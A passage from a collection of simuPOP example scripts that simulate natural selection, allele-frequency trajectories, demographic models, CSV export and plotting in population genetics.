subPops=[(0, sim.ALL_AVAIL)],\n vars='meanOfInfo_sp'),\n sim.PyEval(r\"'Mean of trait1: %.3f (age < 40), %.3f (age >=40)\\n' % \"\n \"(subPop[(0,0)]['meanOfInfo']['qtrait1'], subPop[(0,1)]['meanOfInfo']['qtrait1'])\"),\n ],\n gen = 5\n)\n\n#end_file\n\n#begin_file log/selectParents.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(4000, loci=1, infoFields='fitness')\nsimu = sim.Simulator(pop, rep=3)\nsimu.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[0.5, 0.5])\n ],\n preOps=sim.MapSelector(loci=0, fitness={(0,0):1, (0,1):0.98, (1,1):0.97}),\n matingScheme=sim.RandomMating(),\n postOps=[\n sim.Stat(alleleFreq=0, step=10),\n sim.PyEval(\"'Gen:%3d ' % gen\", reps=0, step=10),\n sim.PyEval(r\"'%.3f\\t' % alleleFreq[0][1]\", step=10),\n sim.PyOutput('\\n', reps=-1, step=10)\n ],\n gen = 50\n)\n#end_file\n\n#begin_file log/selectOffspring.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(10000, loci=1)\nsimu = sim.Simulator(pop, rep=3)\nsimu.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[0.5, 0.5])\n ],\n matingScheme=sim.RandomMating(ops=[\n sim.MendelianGenoTransmitter(),\n sim.MapSelector(loci=0, fitness={(0,0):1, (0,1):0.98, (1,1):0.97}),\n ]),\n postOps=[\n sim.Stat(alleleFreq=0, step=10),\n sim.PyEval(\"'Gen:%3d ' % gen\", reps=0, step=10),\n sim.PyEval(r\"'%.3f\\t' % alleleFreq[0][1]\", step=10),\n sim.PyOutput('\\n', reps=-1, step=10)\n ],\n gen = 50\n)\n#end_file\n\n#begin_file log/MapSelector.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(size=1000, loci=1, infoFields='fitness')\ns1 = .1\ns2 = .2\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[.2, .8])\n ],\n preOps=sim.MapSelector(loci=0, fitness={(0,0):1-s1, (0,1):1, (1,1):1-s2}),\n matingScheme=sim.RandomMating(),\n postOps=[\n sim.Stat(alleleFreq=0),\n sim.PyEval(r\"'%.4f\\n' % alleleFreq[0][0]\", step=100)\n ],\n gen=301\n)\n\n#end_file\n\n\n#begin_file log/MaSelector.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(size=1000, loci=1, infoFields='fitness')\ns1 = .1\ns2 = .2\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[.2] * 5)\n ],\n preOps=sim.MaSelector(loci=0, fitness=[1-s1, 1, 1-s2]),\n matingScheme=sim.RandomMating(),\n postOps=[\n sim.Stat(alleleFreq=0),\n sim.PyEval(r\"'%.4f\\n' % alleleFreq[0][0]\", step=100)\n ],\n gen = 301)\n#end_file\n\n#begin_file log/MaSelectorHaploid.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(size=10000, ploidy=1, loci=[1,1], infoFields='fitness')\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[.5, .5])\n ],\n # fitness values for AB, Ab, aB and ab\n preOps=sim.MaSelector(loci=[0,1], fitness=[1, 1, 1, 0.95]),\n matingScheme=sim.RandomSelection(),\n postOps=[\n sim.Stat(haploFreq=[0, 1], step=25),\n sim.PyEval(r\"'%.3f\\t%.3f\\t%.3f\\t%.3f\\n' % (haploFreq[(0,1)][(0,0)],\"\n \"haploFreq[(0,1)][(0,1)], haploFreq[(0,1)][(1,0)],\"\n \"haploFreq[(0,1)][(1,1)])\", step=25)\n ],\n gen = 100\n)\n#end_file\n\n#begin_file log/MlSelector.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(size=10000, loci=2, infoFields='fitness')\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[.5, .5])\n ],\n preOps=[\n sim.MlSelector([\n sim.MapSelector(loci=0, fitness={(0,0):1, (0,1):1, (1,1):.8}),\n sim.MapSelector(loci=1, fitness={(0,0):1, (0,1):0.9, (1,1):.8}),\n ], mode = sim.ADDITIVE, reps=0),\n sim.MapSelector(loci=0, fitness={(0,0):1, (0,1):1, (1,1):.8}, reps=1),\n sim.MapSelector(loci=1, fitness={(0,0):1, (0,1):0.9, (1,1):.8}, reps=2)\n ],\n matingScheme=sim.RandomMating(),\n postOps=[\n sim.Stat(alleleFreq=[0,1]),\n sim.PyEval(r\"'REP %d:\\t%.3f\\t%.3f\\t' % (rep, alleleFreq[0][1], alleleFreq[1][1])\"),\n sim.PyOutput('\\n', reps=-1),\n ],\n gen = 5\n)\n#end_file\n\n#begin_file log/PySelector.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\nimport random\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(size=2000, loci=[1]*2, infoFields=['fitness', 'smoking'])\ns1 = .02\ns2 = .03\n# the second parameter gen can be used for varying selection pressure\ndef sel(geno, smoking):\n # BB Bb bb\n # AA 1 1 1\n # Aa 1 1-s1 1-s2\n # aa 1 1 1-s2\n #\n # geno is (A1 A2 B1 B2)\n if geno[0] + geno[1] == 1 and geno[2] + geno[3] == 1:\n v = 1 - s1 # case of AaBb\n elif geno[2] + geno[3] == 2:\n v = 1 - s2 # case of ??bb\n else: \n v = 1 # other cases\n if smoking:\n return v * 0.9\n else:\n return v\n\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[.5, .5])\n ],\n preOps=sim.PySelector(loci=[0, 1], func=sel),\n matingScheme=sim.RandomMating(),\n postOps=[\n # set smoking status randomly\n sim.InitInfo(lambda : random.randint(0,1), infoFields='smoking'),\n sim.Stat(alleleFreq=[0, 1], step=20),\n sim.PyEval(r\"'%.4f\\t%.4f\\n' % (alleleFreq[0][1], alleleFreq[1][1])\", step=20)\n ],\n gen = 50\n)\n#end_file\n\n\n#begin_file log/PyMlSelector.py\nimport simuOpt\nsimuOpt.setOptions(quiet=True, alleleType='mutant')\nimport simuPOP as sim\nimport random\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(size=2000, loci=[10000], infoFields=['fitness'])\n\nclass GammaDistributedFitness:\n def __init__(self, alpha, beta):\n self.coefMap = {}\n self.alpha = alpha\n self.beta = beta\n \n def __call__(self, loc, alleles):\n # because s is assigned for each locus, we need to make sure the\n # same s is used for fitness of genotypes 01 (1-s) and 11 (1-2s)\n # at each locus\n if loc in self.coefMap:\n s = self.coefMap[loc]\n else:\n s = random.gammavariate(self.alpha, self.beta)\n self.coefMap[loc] = s\n #\n if 0 in alleles:\n return 1. - s\n else:\n return 1. - 2.*s\n\npop.evolve(\n initOps=sim.InitSex(),\n preOps=[\n sim.AcgtMutator(rate=[0.00001], model='JC69'),\n sim.PyMlSelector(GammaDistributedFitness(0.23, 0.185),\n output='>>sel.txt'),\n ],\n matingScheme=sim.RandomMating(),\n postOps=[\n sim.Stat(numOfSegSites=sim.ALL_AVAIL, step=50),\n sim.PyEval(r\"'Gen: %2d #seg sites: %d\\n' % (gen, numOfSegSites)\",\n step=50)\n ],\n gen = 201\n)\nprint(''.join(open('sel.txt').readlines()[:5]))\n#end_file\n\n\n\n#begin_file log/peneSelector.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(size=2000, loci=1, infoFields='fitness')\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[.5, .5])\n ],\n preOps=[\n sim.MaPenetrance(loci=0, penetrance=[0.01, 0.1, 0.2]),\n sim.Stat(numOfAffected=True, step=25, vars='propOfAffected'),\n sim.PyEval(r\"'Percent of affected: %.3f\\t' % propOfAffected\", step=50),\n sim.InfoExec('fitness = not ind.affected()', exposeInd='ind')\n ],\n matingScheme=sim.RandomMating(),\n postOps=[\n sim.Stat(alleleFreq=0),\n sim.PyEval(r\"'%.4f\\n' % alleleFreq[0][1]\", step=50)\n ],\n gen=151\n)\n#end_file\n\n\n#begin_file log/freqDependentSelector.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(size=2000, loci=1, infoFields='fitness')\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[.5, .5])\n ],\n preOps=[\n sim.Stat(alleleFreq=0),\n sim.InfoExec('''fitness = {\n 0: 1,\n 1: 1 - (alleleFreq[0][1] - 0.5)*0.1, \n 2: 1 - (alleleFreq[0][1] - 0.5)*0.2}[ind.allele(0,0)+ind.allele(0,1)]''',\n exposeInd='ind'),\n sim.Stat(meanOfInfo='fitness'),\n sim.PyEval(r\"'alleleFreq=%.3f, mean fitness=%.5f\\n' % (alleleFreq[0][1], meanOfInfo['fitness'])\",\n step=25),\n ],\n matingScheme=sim.RandomMating(),\n gen=151\n)\n#end_file\n\n\n#begin_file log/vspSelector.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(size=[5000, 5000], loci=1, infoFields='fitness')\npop.setVirtualSplitter(sim.SexSplitter())\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[.5, .5])\n ],\n preOps=[\n sim.MaSelector(loci=0, fitness=[1, 1, 0.98], subPops=[(0,0), (1,1)]),\n sim.MaSelector(loci=0, fitness=[1, 0.99, 0.98], subPops=[(0,1), (1,0)]),\n ],\n matingScheme=sim.RandomMating(),\n postOps=[\n sim.Stat(alleleFreq=[0], subPops=[(sim.ALL_AVAIL, sim.ALL_AVAIL)],\n vars='alleleFreq_sp', step=50),\n sim.PyEval(r\"'%.4f\\t%.4f\\t%.4f\\t%.4f\\n' % \"\n \"tuple([subPop[x]['alleleFreq'][0][1] for x in ((0,0),(0,1),(1,0),(1,1))])\",\n step=50)\n ],\n gen=151\n)\n#end_file\n\n\n#begin_file log/vspDuringMatingSelector.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\npop = sim.Population(size=[5000, 5000], loci=1, infoFields='fitness')\npop.setVirtualSplitter(sim.SexSplitter())\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[.5, .5])\n ],\n matingScheme=sim.RandomMating(ops=[\n sim.MendelianGenoTransmitter(),\n sim.MaSelector(loci=0, fitness=[1, 1, 0.98], subPops=[(0,0), (1,1)]),\n sim.MaSelector(loci=0, fitness=[1, 0.99, 0.98], subPops=[(0,1), (1,0)]),\n ]),\n postOps=[\n sim.Stat(alleleFreq=[0], subPops=[(sim.ALL_AVAIL, sim.ALL_AVAIL)],\n vars='alleleFreq_sp', step=50),\n sim.PyEval(r\"'%.4f\\t%.4f\\t%.4f\\t%.4f\\n' % \"\n \"tuple([subPop[x]['alleleFreq'][0][1] for x in ((0,0),(0,1),(1,0),(1,1))])\",\n step=50)\n ],\n gen=151\n)\n#end_file\n\n#begin_file log/forwardTrajectory.py\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nfrom simuPOP.utils import Trajectory, simulateForwardTrajectory\n\ntraj = simulateForwardTrajectory(N=[2000, 4000], fitness=[1, 0.99, 0.98],\n beginGen=0, endGen=100, beginFreq=[0.2, 0.3],\n endFreq=[[0.1, 0.11], [0.2, 0.21]])\n# \n#traj.plot('log/forwardTrajectory.png', set_ylim_top=0.5,\n# plot_c_sp=['r', 'b'], set_title_label='Simulated Trajectory (forward-time)')\npop = sim.Population(size=[2000, 4000], loci=10, infoFields='fitness')\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[0.8, 0.2], subPops=0),\n sim.InitGenotype(freq=[0.7, 0.3], subPops=1),\n sim.PyOutput('Sp0: loc2\\tloc5\\tSp1: loc2\\tloc5\\n'),\n ],\n matingScheme=sim.ControlledRandomMating(\n ops=[sim.Recombinator(rates=0.01)],\n loci=5, alleles=1, freqFunc=traj.func()),\n postOps=[\n sim.Stat(alleleFreq=[2, 5], vars=['alleleFreq_sp'], step=20),\n sim.PyEval(r\"'%.2f\\t%.2f\\t%.2f\\t%.2f\\n' % (subPop[0]['alleleFreq'][2][1],\"\n \"subPop[0]['alleleFreq'][5][1], subPop[1]['alleleFreq'][2][1],\"\n \"subPop[1]['alleleFreq'][5][1])\", step=20)\n ],\n gen = 101\n)\n#end_file\n\n#begin_file log/backTrajectory.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nfrom simuPOP.utils import Trajectory, simulateBackwardTrajectory\nfrom math import exp\ndef Nt(gen):\n 'An exponential sim.Population growth demographic model.'\n return int((5000) * exp(.00115 * gen))\n\ndef fitness(gen, sp):\n 'Constant positive selection pressure.'\n return [1, 1.01, 1.02]\n\n# simulate a trajectory backward in time, from generation 1000\ntraj = simulateBackwardTrajectory(N=Nt, fitness=fitness, nLoci=2,\n endGen=1000, endFreq=[0.1, 0.2])\n# matplotlib syntax\n#traj.plot('log/backTrajectory.png', set_ylim_top=0.3, set_ylim_bottom=0,\n# plot_c_loc=['r', 'b'], set_title_label='Simulated Trajectory (backward-time)')\n\nprint('Trajectory simulated with length %s ' % len(traj.traj))\npop = sim.Population(size=Nt(0), loci=[1]*2)\n# save Trajectory function in the sim.population's local namespace\n# so that the sim.PyEval operator can access it.\npop.dvars().traj = traj.func()\npop.evolve(\n initOps=[sim.InitSex()],\n preOps=traj.mutators(loci=[0, 1]),\n matingScheme=sim.ControlledRandomMating(loci=[0, 1], alleles=[1, 1],\n subPopSize=Nt, freqFunc=traj.func()),\n postOps=[\n sim.Stat(alleleFreq=[0, 1], begin=500, step=100),\n sim.PyEval(r\"'%4d: %.3f (exp: %.3f), %.3f (exp: %.3f)\\n' % (gen, alleleFreq[0][1],\"\n \"traj(gen)[0], alleleFreq[1][1], traj(gen)[1])\",\n begin=500, step=100)\n ],\n gen=1001 # evolve 1001 generations to reach the end of generation 1000\n)\n#end_file\n\n\n#begin_file log/ProgressBar.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nfrom simuPOP.utils import ProgressBar\npop = sim.Population(10000, loci=[10], infoFields='index')\nprog = ProgressBar('Setting individual genotype...\\n', pop.popSize(), gui=False)\nfor idx in range(pop.popSize()):\n # do something to each individaul\n pop.individual(idx).index = idx\n # idx + 1 can be ignored in this case.\n prog.update(idx + 1)\n\n#end_file\n\n\n#begin_file log/viewVars.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True, gui=False)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nfrom simuPOP.utils import viewVars\npop = sim.Population([1000, 2000], loci=3)\nsim.initGenotype(pop, freq=[0.2, 0.4, 0.4], loci=0)\nsim.initGenotype(pop, freq=[0.2, 0.8], loci=2)\nsim.stat(pop, genoFreq=[0, 1, 2], haploFreq=[0, 1, 2],\n alleleFreq=range(3),\n vars=['genoFreq', 'genoNum', 'haploFreq', 'alleleNum_sp'])\nviewVars(pop.vars())\n#end_file\n\n\n#begin_file log/saveCSV.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True, gui=False)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nfrom simuPOP.utils import saveCSV\npop = sim.Population(size=[10], loci=[2, 3],\n lociNames=['r11', 'r12', 'r21', 'r22', 'r23'],\n alleleNames=['A', 'B'], infoFields='age')\nsim.initSex(pop)\nsim.initInfo(pop, [2, 3, 4], infoFields='age')\nsim.initGenotype(pop, freq=[0.4, 0.6])\nsim.maPenetrance(pop, loci=0, penetrance=(0.2, 0.2, 0.4))\n# no filename so output to standard output\nsaveCSV(pop, infoFields='age')\n# change affection code and how to output genotype\nsaveCSV(pop, infoFields='age', affectionFormatter={True: 1, False: 2},\n genoFormatter={(0,0):'AA', (0,1):'AB', (1,0):'AB', (1,1):'BB'})\n# save to a file\nsaveCSV(pop, filename='pop.csv', infoFields='age', affectionFormatter={True: 1, False: 2},\n genoFormatter=lambda geno: (geno[0] + 1, geno[1] + 1), sep=' ')\nprint(open('pop.csv').read())\n#begin_ignore\nimport os\nos.remove('pop.csv')\n#end_ignore\n#end_file\n\n#begin_file log/saveCSV.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True, gui=False)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nfrom simuPOP.utils import saveCSV\npop = sim.Population(size=[10], loci=[2, 3],\n lociNames=['r11', 'r12', 'r21', 'r22', 'r23'],\n alleleNames=['A', 'B'], infoFields='age')\nsim.initSex(pop)\nsim.initInfo(pop, [2, 3, 4], infoFields='age')\nsim.initGenotype(pop, freq=[0.4, 0.6])\nsim.maPenetrance(pop, loci=0, penetrance=(0.2, 0.2, 0.4))\n# no filename so output to standard output\nsaveCSV(pop, infoFields='age')\n# change affection code and how to output genotype\nsaveCSV(pop, infoFields='age', affectionFormatter={True: 1, False: 2},\n genoFormatter={(0,0):'AA', (0,1):'AB', (1,0):'AB', (1,1):'BB'})\n# save to a file\nsaveCSV(pop, filename='pop.csv', infoFields='age', affectionFormatter={True: 1, False: 2},\n genoFormatter=lambda geno: (geno[0] + 1, geno[1] + 1), sep=' ')\nprint(open('pop.csv').read())\n#begin_ignore\nimport os\nos.remove('pop.csv')\n#end_ignore\n#end_file\n\n\n\n#begin_file log/demoModel.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\nfrom simuPOP.demography import *\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nmodel = MultiStageModel([\n InstantChangeModel(T=200, \n # start with an ancestral population of size 1000\n N0=(1000, 'Ancestral'),\n # change population size at 50 and 60\n G=[50, 60], \n # change to population size 200 and back to 1000\n NG=[(200, 'bottleneck'), (1000, 'Post-Bottleneck')]),\n ExponentialGrowthModel(\n T=50, \n # split the population into two subpopulations\n N0=[(400, 'P1'), (600, 'P2')],\n # expand to size 4000 and 5000 respectively\n NT=[4000, 5000])]\n )\n#\n# model.init_size returns the initial population size\n# migrate_to is required for migration\npop = sim.Population(size=model.init_size, loci=1,\n infoFields=model.info_fields)\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[0.5, 0.5])\n ],\n matingScheme=sim.RandomMating(subPopSize=model),\n finalOps=\n sim.Stat(alleleFreq=0, vars=['alleleFreq_sp']),\n gen=model.num_gens\n)\n# print out population size and frequency\nfor idx, name in enumerate(pop.subPopNames()):\n print('%s (%d): %.4f' % (name, pop.subPopSize(name), \n pop.dvars(idx).alleleFreq[0][0]))\n\n# get a visual presentation of the demographic model\nmodel.plot('log/demoModel.png',\n title='A bottleneck + exponential growth demographic model')\n#begin_ignore\nMultiStageModel([\n LinearGrowthModel(T=100, N0=1000, r=0.01), \n ExponentialGrowthModel(T=100, N0=[0.4, 0.6], r=0.001),\n ExponentialGrowthModel(r=0.01, NT=[2000, 4000]),\n AdmixtureModel(model=('HI', 0, 1, 0.8, 'admixed'), T=10)\n]).plot('log/MultiStage.png')\nOutOfAfricaModel(10000).plot('log/OutOfAfrica.png')\n#OutOfAfricaModel(10000, scale=10).plot('log/ScaledOutOfAfrica.png')\nSettlementOfNewWorldModel(10000).plot('log/SettlementOfNewWorld.png')\n#SettlementOfNewWorldModel(10000, scale=10).plot('log/ScaledSettlementOfNewWorld.png')\nCosiModel(20000).plot('log/Cosi.png')\n#CosiModel(20000, scale=10).plot('log/ScaledCosi.png')\n#end_ignore\n#end_file\n\n\n\n\n#begin_file log/demoEventModel.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\nfrom simuPOP.demography import *\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nimport math\nmodel = EventBasedModel(\n N0=(1000, 'Ancestral'),\n T=250,\n events=[\n ResizeEvent(at=50, sizes=200),\n ResizeEvent(at=60, sizes=1000),\n SplitEvent(sizes=[0.4, 0.6], names=['P1', 'P2'], at=200),\n ExpansionEvent(rates=[math.log(4000/400)/50, math.log(5000/600)/50], begin=200)\n ]\n)\n#\n# model.init_size returns the initial population size\n# migrate_to is required for migration\npop = sim.Population(size=model.init_size, loci=1,\n infoFields=model.info_fields)\npop.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(freq=[0.5, 0.5])\n ],\n matingScheme=sim.RandomMating(subPopSize=model),\n finalOps=\n sim.Stat(alleleFreq=0, vars=['alleleFreq_sp']),\n gen=model.num_gens\n)\n# print out population size and frequency\nfor idx, name in enumerate(pop.subPopNames()):\n print('%s (%d): %.4f' % (name, pop.subPopSize(name), \n pop.dvars(idx).alleleFreq[0][0]))\n\n# get a visual presentation of the demographic model\nmodel.plot('log/demoEventModel.png',\n title='A event-based bottleneck + exponential growth demographic model')\n\n#end_file\n\n#begin_file log/demoTerminate.py\n#begin_ignore\nimport simuOpt\n#end_ignore\nimport simuPOP as sim\nimport simuPOP.demography as demo\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\n\nmodel = demo.MultiStageModel([\n demo.InstantChangeModel(N0=1000, \n ops=[\n sim.Stat(alleleFreq=sim.ALL_AVAIL, numOfSegSites=sim.ALL_AVAIL),\n # terminate if the average allele frequency of segregating sites\n # are more than 0.1 \n sim.TerminateIf('sum([x[1] for x in alleleFreq.values() if '\n 'x[1] != 0])/(1 if numOfSegSites==0 else numOfSegSites) > 0.1')\n ]\n ),\n demo.ExponentialGrowthModel(N0=[0.5, 0.5], r=0.01, NT=[2000, 5000])\n ]\n)\n\npop = sim.Population(size=model.init_size, loci=100)\npop.evolve(\n initOps=sim.InitSex(),\n preOps=sim.SNPMutator(u=0.001, v=0.001),\n matingScheme=sim.RandomMating(subPopSize=model),\n postOps=[\n sim.Stat(alleleFreq=sim.ALL_AVAIL, numOfSegSites=sim.ALL_AVAIL,\n popSize=True, step=50),\n sim.PyEval(r'\"%d: %s, %.3f\\n\" % (gen, subPopSize, sum([x[1] for x '\n 'in alleleFreq.values() if x[1] != 0])/(1 if numOfSegSites == 0 '\n 'else numOfSegSites))', step=50)\n ],\n)\n\n#end_file\n\n\n\n#begin_file log/varPlotByRep.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nimport simuPOP as sim\nfrom simuPOP.plotter import VarPlotter\npop = sim.Population(size=1000, loci=1*4)\nsimu = sim.Simulator(pop, rep=3)\nsimu.evolve(\n initOps=[sim.InitSex()] +\n [sim.InitGenotype(freq=[0.1*(x+1), 1-0.1*(x+1)], loci=x) for x in range(4)],\n matingScheme=sim.RandomMating(),\n postOps=[\n sim.Stat(alleleFreq=range(4)),\n VarPlotter('[alleleFreq[x][0] for x in range(4)]', byRep=True,\n update=10, saveAs='log/varplot_byRep.png',\n figure_figsize=(10, 8),\n legend=['Locus %d' % x for x in range(4)],\n set_ylabel_ylabel='Allele frequency',\n set_ylim_bottom=0, set_ylim_top=1,\n set_title_label_rep=['Genetic drift, replicate %d' % x for x in range(3)],\n ),\n ],\n gen=100\n)\n#end_file\n\n#begin_file log/varPlotter.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nfrom simuPOP.plotter import VarPlotter\npop = sim.Population(size=1000, loci=2)\nsimu = sim.Simulator(pop, rep=3)\nsimu.evolve(\n initOps=[\n sim.InitSex(),\n sim.InitGenotype(genotype=[1, 2, 2, 1])\n ],\n matingScheme=sim.RandomMating(ops=sim.Recombinator(rates=0.01)),\n postOps=[\n sim.Stat(LD=[0, 1]),\n # \n VarPlotter('LD[0][1]', step=5, update=40, saveAs='log/varplot.png',\n legend=['Replicate %d' % x for x in range(3)],\n set_ylabel_ylabel='LD between marker 1 and 2',\n set_title_label='LD decay',\n set_ylim_bottom=0, set_ylim_top=0.25,\n plot_linestyle_rep=['-', ':', '-.'],\n ),\n ],\n gen=100\n)\n#end_file\n\n#begin_file log/varPlotByDim.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nimport simuPOP as sim\nfrom simuPOP.plotter import VarPlotter\npop = sim.Population(size=1000, loci=1*4)\nsimu = sim.Simulator(pop, rep=3)\ndef rpy_drawFrame(r, dim=None, **kwargs):\n '''Draw a frame around subplot dim. Parameter r is defined in the rpy\n module and is used for calling R functions. Parameter dim is the dimension\n index. Other parameters are ignored.\n '''\n r.axis(1)\n r.axis(2)\n r.grid()\n r.mtext({0:'A', 1:'B', 2:'C', 3:'D'}[dim], adj=1)\n\ndef mat_drawFrame(ax, dim=None, **kwargs):\n '''Draw a frame around subplot dim. Parameter r is defined in the rpy\n module and is used for calling R functions. Parameter dim is the dimension\n index. Other parameters are ignored.\n '''\n ax.grid()\n ax.text(0.5, 0.8, {0:'A', 1:'B', 2:'C', 3:'D'}[dim])\n\nsimu.evolve(\n initOps=[sim.InitSex()]+\n [sim.InitGenotype(freq=[0.1*(x+1), 1-0.1*(x+1)], loci=x) for x in range(4)],\n matingScheme=sim.RandomMating(),\n postOps=[\n sim.Stat(alleleFreq=range(4)),\n VarPlotter('[alleleFreq[x][0] for x in range(4)]', byDim=True,\n update=10, saveAs='log/varplot_byDim.png',\n legend=['Replicate %d' % x for x in range(3)],\n set_ylabel_ylabel='Allele frequency',\n set_ylim_bottom=0, set_ylim_top=1,\n set_title_label_dim=['Genetic drift, freq=%.1f' % ((x+1)*0.10) for x in range(4)],\n plot_c_rep=['red', 'blue', 'black'],\n plot_linestyle_rep=['-', '-.', ':'],\n figure_figsize=(10,8),\n plotHook = mat_drawFrame,\n ),\n ],\n gen=100\n)\n#end_file\n\n#begin_file log/ScatterPlotter.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nimport simuPOP as sim\nfrom simuPOP.plotter import ScatterPlotter\nimport random\npop = sim.Population([500], infoFields=['x', 'y', 'anc'])\n# Defines VSP 0, 1, 2, 3, 4 by anc.\npop.setVirtualSplitter(sim.InfoSplitter('anc', cutoff=[0.2, 0.4, 0.6, 0.8]))\n#\ndef passInfo(x, y, anc):\n 'Parental fields will be passed as tuples'\n off_anc = (anc[0] + anc[1])/2.\n off_x = (x[0] + x[1])/2 + random.normalvariate(off_anc - 0.5, 0.1)\n off_y = (y[0] + y[1])/2 + random.normalvariate(0, 0.1)\n return off_x, off_y, off_anc\n\npop.evolve(\n initOps=[\n sim.InitSex(),\n # random geographic location\n sim.InitInfo(random.random, infoFields=['x', 'y']),\n # anc is 0 or 1\n sim.InitInfo(lambda : random.randint(0, 1), infoFields='anc')\n ],\n matingScheme=sim.RandomMating(ops=[\n sim.MendelianGenoTransmitter(),\n sim.PyTagger(passInfo)]),\n postOps=[\n ScatterPlotter(['x', 'y'], \n saveAs = 'log/ScatterPlotter.png',\n subPops = [(0, 0), (0, 1), (0, 2), (0, 3), (0, 4)],\n set_ylim_bottom = 0, set_ylim_top=1.2,\n set_title_label = \"!'Ancestry distribution of individuals at generation %d' % gen\",\n legend = ['anc < 0.2', '0.2 <= anc < 0.4', '0.4 <= anc < 0.6',\n '0.6 <= anc < 0.8', '0.8 <= anc'],\n ),\n\n ],\n gen = 5,\n)\n#end_file\n\n\n#begin_file log/getParam.py\n#begin_ignore\nimport simuOpt\nsimuOpt.setOptions(quiet=True)\n#end_ignore\nimport simuPOP as sim\n#begin_ignore\nsim.setRNG(seed=12345)\n#end_ignore\nimport types, simuOpt\noptions = [\n {'name': 'rate',\n 'default': [0.01],\n 'label': 'Recombination rate',\n 'type': 'numbers',\n 'description': '''Recombination rate for each replicate. If a single value\n is given, it will be used for all 